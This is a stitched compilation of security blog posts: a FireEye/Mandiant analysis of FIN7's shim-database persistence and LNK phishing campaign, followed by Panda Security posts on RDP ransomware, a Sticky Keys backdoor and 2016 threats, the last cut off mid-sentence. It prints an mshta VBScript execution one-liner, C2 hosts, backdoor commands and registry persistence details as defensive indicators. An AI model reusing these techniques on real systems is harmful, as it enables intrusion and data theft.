FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077” was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process

Detection

Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries
  • processList: Send list of process running
  • screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VB script
  • runexe: Executes EXE file
  • runps1: Executes PowerShell script
  • delete: Delete the specified file
  • update: Update the specified file

All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:

Function send_data(data)
                random_string = custom_function_to_generate_random_string()
                encoded_data = URLEncode(SimpleEncrypt(data))
                post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,
Create_Random_Url(class_id))

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

A User-Friendly Interface for Cyber-criminals

IMG-MC-wysiwye

Installing malware through Remote Desktop Protocol is a popular attack method used by many cyber-criminals. over the past few months Panda Security’s research facility PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through brute a force attack on the RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware automatically to start the encryption.

wysiwye-530x483Recently however, PandaLabs has noticed more personalised attacks. Analysing this intrusion we see that the ransomware comes with its own interface, through which its can be configured according to the attackers preferences. Starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to action on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360 guarantees better protections against new age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Hackers Spark Revival of Sticky Keys Attacks

password

Hackers are constantly trying to find new ways to bypass cyber-security efforts, sometimes turning to older, almost forgotten methods to gain access to valuable data. Researchers at PandaLabs, Panda Security’s anti-malware research facility, recently detected a targeted attack which did not use malware, but rather used scripts and other tools associated with the operating system itself in order to bypass scanners.

Using an attack method that has gained popularity recently, the hacker launch a brute-force attack against the server with the Remote Desktop Protocol (RDP) enabled. Once they have access to the log-in credentials of a device, the intruders gain complete access to it.
At this stage, the attackers run the seethe.exe file with the parameter 211 from the computers’ Command Prompt window (CMD) – turning on the ‘Sticky Keys’ feature.

1-1

Next, the hacker initiates Traffic Spirit – a traffic generator application that ensure the attack is lucrative for the cyber-criminals.

2

Once this is complete, a self-extracting file is launched that uncompresses the following files in the %Windows%\cmdacoBin folder:
• registery.reg
• SCracker.bat
• sys.bat

The hacker then runs the Windows registry editor (Regedit.exe) to add the following key contained in the registery.reg file:

3

This key aims at ensuring that every time the Sticky Keys feature is used (sethc.exe), a file called SCracker.bat is run. This is a batch file that implements a very simple authentication system. Running the file displays the following window:

4

The user name and password are obtained from two variables included in the sys.bat file:

5

This creates a backdoor into the device through which the hacker gains access. Using the backdoor, the hacker is able to connect to the targeted computer without having to enter the login credentials, enable the Sticky Keys feature, or enter the relevant user name and password to open a command shell:

6

The command shell shortcuts allow the hacker to access certain directories, change the console colour, and make use of other typical command-line actions.

7

The attack doesn’t stop there. In their attempt to capitalise on the attack, a Bitcoin miner is installed, to take advantage of every compromised computer. This software aims to use the victims’ computer resources to generate the virtual currency without them realising it.
Even if the victim realises their device has been breached and changes their credentials – the hacker is still able to gain access to the system. To enable Sticky Keys, the hacker enter the SHIFT key five times, allowing the cyber-criminal to activate the backdoor one again.

Adaptive Defense 360, Panda Security’s advanced cyber-security solution, was capable of stopping this targeted attack thanks to the continuous monitoring of the company’s IT network, saving the organisation from serious financial and reputational harm. Business leaders need to recognise the need for advanced security, such as AD360, to protect their network from these kinds of attacks.

The post Hackers Spark Revival of Sticky Keys Attacks appeared first on CyberSafety.co.za.

Cyber Security Predictions for 2017

Pandalabs-summer16

Analysis

2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect a large number of computers possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


Ranking the top attacks of 2016

art-blog


Ransomware

We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of system tool PowerShell has risen this year, installed by default in Windows 10 and frequently used in attacks to avoid detection by security solutions installed on victims computers.

In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers. If the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisations network, the hackers sent a file with a list of every device connected to the company’s internal network.

Ransomware as a Service (RaaS) presented as the latest development in the Ransomware industry. In Q3 we witnessed to a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, specialised in the development aspect of malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part they leave it up to the distributors to be in charge of infecting their victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired. The higher the sales, the higher the percentage that they receive.


Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.

smartphones-blog


Mobile Devices

SNAP is one the most popular vulnerabilities that we’ve seen this year – affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which gives permission for the running of any JavaScript. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update of version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by a software spy known as Pegasus, developed by the NGO Group, an Israeli organization with products similar to those offered by Hacking Team.


Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (inserting an SD card in it), he raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving the MAC address of as an identifier of every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.

cybersecurity3


Cyberwarfare

2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


Cybercrime

In June, a criminal dubbed “The Dark Overlord” put patient information from three US instit